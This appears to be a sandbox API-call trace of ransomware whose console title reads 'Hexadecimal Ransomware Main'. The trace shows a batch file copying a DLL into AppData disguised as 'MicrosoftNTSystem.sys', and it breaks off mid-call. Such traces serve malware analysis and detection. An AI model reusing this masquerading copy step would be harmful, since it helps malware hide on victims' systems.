[0106.909] GetProcessHeap () returned 0x1dc256b0000 [0106.909] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256b1640) returned 1 [0106.909] GetProcessHeap () returned 0x1dc256b0000 [0106.909] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x12) returned 0x1dc256b9000 [0106.909] lstrcmpW (lpString1="\\tree.com", lpString2="\\XCOPY.EXE") returned -1 [0106.909] _get_osfhandle (_FileHandle=1) returned 0x50 [0106.909] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0106.913] _get_osfhandle (_FileHandle=0) returned 0x4c [0106.913] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0106.916] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\tree.com", lpCommandLine="tree", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x407419e650*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tree", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x407419e628 | out: lpCommandLine="tree", lpProcessInformation=0x407419e628*(hProcess=0xa0, hThread=0x9c, dwProcessId=0x4b0, dwThreadId=0x390)) returned 1 [0106.928] CloseHandle (hObject=0x9c) returned 1 [0106.928] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0106.928] GetProcessHeap () returned 0x1dc256b0000 [0106.928] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bf990) returned 1 [0106.928] GetEnvironmentStringsW () returned 0x1dc256b5e60* [0106.928] GetProcessHeap () returned 0x1dc256b0000 [0106.928] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xec2) returned 0x1dc256bf990 [0106.929] FreeEnvironmentStringsA (penv="=") returned 1 [0106.929] WaitForSingleObject (hHandle=0xa0, dwMilliseconds=0xffffffff) returned 0x0 [0107.405] GetExitCodeProcess (in: hProcess=0xa0, lpExitCode=0x407419e5a8 | out: lpExitCode=0x407419e5a8*=0x0) returned 1 [0107.405] CloseHandle (hObject=0xa0) returned 1 [0107.406] _vsnwprintf (in: _Buffer=0x407419e778, _BufferCount=0x13, _Format="%08X", _ArgList=0x407419e5b8 | out: _Buffer="00000000") returned 8 [0107.406] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0107.406] GetProcessHeap () returned 0x1dc256b0000 [0107.406] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bf990) returned 1 [0107.406] GetEnvironmentStringsW () returned 0x1dc256b5e60* [0107.406] GetProcessHeap () returned 0x1dc256b0000 [0107.406] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xec2) returned 0x1dc256bf990 [0107.406] FreeEnvironmentStringsA (penv="=") returned 1 [0107.406] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0107.406] GetProcessHeap () returned 0x1dc256b0000 [0107.406] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bf990) returned 1 [0107.406] GetEnvironmentStringsW () returned 0x1dc256b5e60* [0107.406] GetProcessHeap () returned 0x1dc256b0000 [0107.406] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xec2) returned 0x1dc256bf990 [0107.406] FreeEnvironmentStringsA (penv="=") returned 1 [0107.406] GetProcessHeap () returned 0x1dc256b0000 [0107.406] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256b9000) returned 1 [0107.406] DeleteProcThreadAttributeList (in: lpAttributeList=0x407419e730 | out: lpAttributeList=0x407419e730) [0107.406] ??_V@YAXPEAX@Z () returned 0x1 [0107.407] _get_osfhandle (_FileHandle=1) returned 0x50 [0107.408] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0107.409] _get_osfhandle (_FileHandle=1) returned 0x50 [0107.410] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x7ff67b90fc08 | out: lpMode=0x7ff67b90fc08) returned 1 [0107.411] _get_osfhandle (_FileHandle=1) returned 0x50 [0107.411] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x7) returned 1 [0107.420] _get_osfhandle (_FileHandle=0) returned 0x4c [0107.420] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x7ff67b90fc0c | out: lpMode=0x7ff67b90fc0c) returned 1 [0107.434] _get_osfhandle (_FileHandle=0) returned 0x4c [0107.435] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1e7) returned 1 [0107.441] SetConsoleInputExeNameW () returned 0x1 [0107.441] GetConsoleOutputCP () returned 0x1b5 [0107.444] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff67b90fbb0 | out: lpCPInfo=0x7ff67b90fbb0) returned 1 [0107.444] SetThreadUILanguage (LangId=0x0) returned 0x409 [0107.446] ??_V@YAXPEAX@Z () returned 0x1 [0107.448] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\9b7b.tmp\\9bba.tmp\\9bcb.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x407419eef8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0107.448] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0107.448] _get_osfhandle (_FileHandle=3) returned 0xa0 [0107.448] SetFilePointer (in: hFile=0xa0, lDistanceToMove=87, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x57 [0107.448] GetProcessHeap () returned 0x1dc256b0000 [0107.448] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256be600) returned 1 [0107.448] GetProcessHeap () returned 0x1dc256b0000 [0107.448] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256be430) returned 1 [0107.449] GetProcessHeap () returned 0x1dc256b0000 [0107.449] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bd470) returned 1 [0107.449] GetProcessHeap () returned 0x1dc256b0000 [0107.449] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256e8710) returned 1 [0107.449] GetProcessHeap () returned 0x1dc256b0000 [0107.449] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bbb60) returned 1 [0107.449] GetProcessHeap () returned 0x1dc256b0000 [0107.449] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256d8720) returned 1 [0107.449] GetProcessHeap () returned 0x1dc256b0000 [0107.449] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bcf80) returned 1 [0107.449] GetProcessHeap () returned 0x1dc256b0000 [0107.449] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256be260) returned 1 [0107.449] GetProcessHeap () returned 0x1dc256b0000 [0107.449] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bd9e0) returned 1 [0107.449] GetProcessHeap () returned 0x1dc256b0000 [0107.450] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256d86c0) returned 1 [0107.451] GetProcessHeap () returned 0x1dc256b0000 [0107.451] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256b9920) returned 1 [0107.451] GetProcessHeap () returned 0x1dc256b0000 [0107.451] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bba70) returned 1 [0107.451] _get_osfhandle (_FileHandle=3) returned 0xa0 [0107.451] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x57 [0107.451] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff67b909970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x407419eeb0, lpOverlapped=0x0 | out: lpBuffer=0x7ff67b909970*, lpNumberOfBytesRead=0x407419eeb0*=0x192, lpOverlapped=0x0) returned 1 [0107.452] SetFilePointer (in: hFile=0xa0, lDistanceToMove=181, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb5 [0107.452] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff67b909970, cbMultiByte=94, lpWideCharStr=0x7ff67b913c30, cchWideChar=8191 | out: lpWideCharStr="copy rd000db.dll C:\\Users\\%username%\\AppData\\Roaming\\Microsoft\\Windows\\MicrosoftNTSystem.sys\r\n") returned 94 [0107.452] _get_osfhandle (_FileHandle=3) returned 0xa0 [0107.452] GetFileType (hFile=0xa0) returned 0x1 [0107.452] _get_osfhandle (_FileHandle=3) returned 0xa0 [0107.452] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb5 [0107.452] GetProcessHeap () returned 0x1dc256b0000 [0107.452] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x4012) returned 0x1dc256c0860 [0107.453] GetProcessHeap () returned 0x1dc256b0000 [0107.453] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x4010) returned 0x1dc256d86c0 [0107.454] GetProcessHeap () returned 0x1dc256b0000 [0107.454] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x22) returned 0x1dc256b9920 [0107.454] GetEnvironmentVariableW (in: lpName="username", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer="FD1HVy") returned 0x6 [0107.454] GetProcessHeap () returned 0x1dc256b0000 [0107.454] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256b9920) returned 1 [0107.454] GetProcessHeap () returned 0x1dc256b0000 [0107.454] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256d86c0) returned 1 [0107.455] GetProcessHeap () returned 0x1dc256b0000 [0107.455] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c0860) returned 1 [0107.456] _wcsicmp (_String1="copy", _String2=")") returned 58 [0107.456] _wcsicmp (_String1="FOR", _String2="copy") returned 3 [0107.456] _wcsicmp (_String1="FOR/?", _String2="copy") returned 3 [0107.456] _wcsicmp (_String1="IF", _String2="copy") returned 6 [0107.456] _wcsicmp (_String1="IF/?", _String2="copy") returned 6 [0107.456] _wcsicmp (_String1="REM", _String2="copy") returned 15 [0107.456] _wcsicmp (_String1="REM/?", _String2="copy") returned 15 [0107.456] GetProcessHeap () returned 0x1dc256b0000 [0107.456] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xb0) returned 0x1dc256bba70 [0107.456] GetProcessHeap () returned 0x1dc256b0000 [0107.456] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1a) returned 0x1dc256b9920 [0107.457] GetProcessHeap () returned 0x1dc256b0000 [0107.457] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xba) returned 0x1dc256bb180 [0107.457] _tell (_FileHandle=3) returned 181 [0107.457] _close (_FileHandle=3) returned 0 [0107.458] malloc (_Size=0xffce) returned 0x1dc257e0160 [0107.458] ??_V@YAXPEAX@Z () returned 0x1dc257e0160 [0107.459] _wcsicmp (_String1="copy", _String2="DIR") returned -1 [0107.459] _wcsicmp (_String1="copy", _String2="ERASE") returned -2 [0107.459] _wcsicmp (_String1="copy", _String2="DEL") returned -1 [0107.459] _wcsicmp (_String1="copy", _String2="TYPE") returned -17 [0107.459] _wcsicmp (_String1="copy", _String2="COPY") returned 0 [0107.459] GetConsoleTitleW (in: lpConsoleTitle=0x407419eca0, nSize=0x104 | out: lpConsoleTitle="Administrator: Hexadecimal Ransomware Main") returned 0x2c [0107.469] malloc (_Size=0xffce) returned 0x1dc257f0140 [0107.469] ??_V@YAXPEAX@Z () returned 0x1dc257f0140 [0107.469] malloc (_Size=0xffce) returned 0x1dc25800120 [0107.470] ??_V@YAXPEAX@Z () returned 0x1dc25800120 [0107.470] _wcsicmp (_String1="copy", _String2="DIR") returned -1 [0107.470] _wcsicmp (_String1="copy", _String2="ERASE") returned -2 [0107.470] _wcsicmp (_String1="copy", _String2="DEL") returned -1 [0107.470] _wcsicmp (_String1="copy", _String2="TYPE") returned -17 [0107.470] _wcsicmp (_String1="copy", _String2="COPY") returned 0 [0107.471] ??_V@YAXPEAX@Z () returned 0x1 [0107.471] GetProcessHeap () returned 0x1dc256b0000 [0107.471] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x164) returned 0x1dc256be260 [0107.471] GetProcessHeap () returned 0x1dc256b0000 [0107.471] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256be260, Size=0xba) returned 0x1dc256be260 [0107.471] GetProcessHeap () returned 0x1dc256b0000 [0107.471] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256be260) returned 0xba [0107.471] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0107.472] GetProcessHeap () returned 0x1dc256b0000 [0107.472] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xc4) returned 0x1dc256bab00 [0107.472] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x1dc257b0080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0107.472] GetProcessHeap () returned 0x1dc256b0000 [0107.472] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x58) returned 0x1dc256bef60 [0107.472] GetProcessHeap () returned 0x1dc256b0000 [0107.472] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x58) returned 0x1dc256becc0 [0107.472] GetProcessHeap () returned 0x1dc256b0000 [0107.472] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x20) returned 0x1dc256bbb60 [0107.472] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0107.472] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0107.472] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0107.472] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0107.473] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0107.473] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0107.473] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0107.473] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0107.473] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0107.473] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0107.473] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0107.473] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0107.473] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0107.473] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0107.473] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0107.473] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0107.473] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0107.473] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0107.473] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0107.473] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0107.473] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0107.474] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0107.474] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0107.474] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0107.474] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0107.474] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0107.474] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0107.474] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0107.474] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0107.474] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0107.474] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0107.474] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0107.474] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0107.474] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0107.474] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0107.474] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0107.474] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0107.474] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0107.474] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0107.474] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0107.474] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0107.474] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0107.474] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0107.474] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0107.474] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0107.474] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0107.475] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0107.475] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0107.475] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0107.475] GetProcessHeap () returned 0x1dc256b0000 [0107.475] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bbb60) returned 1 [0107.475] GetProcessHeap () returned 0x1dc256b0000 [0107.475] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x20) returned 0x1dc256bbb60 [0107.475] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0107.475] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0107.475] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0107.475] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0107.475] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0107.475] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0107.475] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0107.475] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0107.475] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0107.475] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0107.475] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0107.475] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0107.475] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0107.475] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0107.475] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0107.475] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0107.475] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0107.475] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0107.475] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0107.476] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0107.476] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0107.476] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0107.476] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0107.476] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0107.476] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0107.476] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0107.476] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0107.476] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0107.476] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0107.476] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0107.476] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0107.476] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0107.476] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0107.476] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0107.476] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0107.476] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0107.476] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0107.476] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0107.476] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0107.476] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0107.476] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0107.476] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0107.476] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0107.476] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0107.476] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0107.476] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0107.476] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0107.476] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0107.477] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0107.477] GetProcessHeap () returned 0x1dc256b0000 [0107.477] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bbb60) returned 1 [0107.477] GetProcessHeap () returned 0x1dc256b0000 [0107.477] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x164) returned 0x1dc256be330 [0107.477] GetProcessHeap () returned 0x1dc256b0000 [0107.477] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256be330, Size=0xba) returned 0x1dc256be330 [0107.477] GetProcessHeap () returned 0x1dc256b0000 [0107.477] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256be330) returned 0xba [0107.477] GetProcessHeap () returned 0x1dc256b0000 [0107.477] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x58) returned 0x1dc256beae0 [0107.477] GetProcessHeap () returned 0x1dc256b0000 [0107.477] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x260) returned 0x1dc256be400 [0107.499] _wcsicmp (_String1="rd000db.dll", _String2=".") returned 68 [0107.499] _wcsicmp (_String1="rd000db.dll", _String2="..") returned 68 [0107.499] GetFileAttributesW (lpFileName="rd000db.dll" (normalized: "c:\\users\\fd1hvy\\desktop\\rd000db.dll")) returned 0x20 [0107.499] GetProcessHeap () returned 0x1dc256b0000 [0107.499] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x58) returned 0x1dc256bed20 [0107.499] GetProcessHeap () returned 0x1dc256b0000 [0107.499] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x260) returned 0x1dc256be670 [0107.499] _wcsicmp (_String1="MicrosoftNTSystem.sys", _String2=".") returned 63 [0107.499] _wcsicmp (_String1="MicrosoftNTSystem.sys", _String2="..") returned 63 [0107.499] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x27, ProcessInformation=0x407419e9fc, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x407419e9fc, ReturnLength=0x0) returned 0x0 [0107.500] NtSetInformationProcess (ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x27, ProcessInformation=0x407419e9f8, ProcessInformationLength=0x4) returned 0x0 [0107.500] malloc (_Size=0xffce) returned 0x1dc25800120 [0107.501] ??_V@YAXPEAX@Z () returned 0x1dc25800120 [0107.501] malloc (_Size=0xffce) returned 0x1dc25810100 [0107.502] ??_V@YAXPEAX@Z () returned 0x1dc25810100 [0107.502] malloc (_Size=0xffce) returned 0x1dc258200e0 [0107.503] ??_V@YAXPEAX@Z () returned 0x1dc258200e0 [0107.503] malloc (_Size=0x1ff9c) returned 0x1dc258300c0 [0107.504] ??_V@YAXPEAX@Z () returned 0x1dc258300c0 [0107.505] VirtualAlloc (lpAddress=0x0, dwSize=0xfe00, flAllocationType=0x1000, flProtect=0x4) returned 0x1dc25610000 [0107.505] FindFirstFileExW (in: lpFileName="rd000db.dll", fInfoLevelId=0x1, lpFindFileData=0x1dc256be410, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1dc256be410) returned 0x1dc256bee40 [0107.505] malloc (_Size=0xffce) returned 0x1dc25850070 [0107.506] ??_V@YAXPEAX@Z () returned 0x1dc25850070 [0107.507] malloc (_Size=0xffce) returned 0x1dc25860050 [0107.507] ??_V@YAXPEAX@Z () returned 0x1dc25860050 [0107.508] ??_V@YAXPEAX@Z () returned 0x1 [0107.508] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\MicrosoftNTSystem.sys", nBufferLength=0x7fe7, lpBuffer=0x1dc25850070, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\MicrosoftNTSystem.sys", lpFilePart=0x0) returned 0x47 [0107.508] ??_V@YAXPEAX@Z () returned 0x1 [0107.509] _wcsicmp (_String1="rd000db.dll", _String2="con") returned 15 [0107.509] CreateFileW 